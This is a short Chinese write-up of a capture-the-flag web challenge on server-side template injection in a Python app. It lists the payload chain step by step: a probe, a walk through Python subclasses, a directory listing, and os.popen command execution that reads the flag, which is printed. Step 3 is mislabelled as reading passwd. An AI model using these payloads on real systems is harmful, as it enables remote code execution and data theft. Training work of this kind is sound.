攻防世界(进阶)--WEB--7.Web_python_temp

考察点：模板注入

1.模板检测：{{7+7}}

7+7=14，确实是模板注入

2.查看服务器配置信息：{{''.__class__.__mro__[2].__subclasses__()}}

3.读取passwd信息：{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

发现2个文件：'fl4g', 'index.py'

4.打开'fl4g'：{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('cat fl4g').read()}}

得到flag：ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}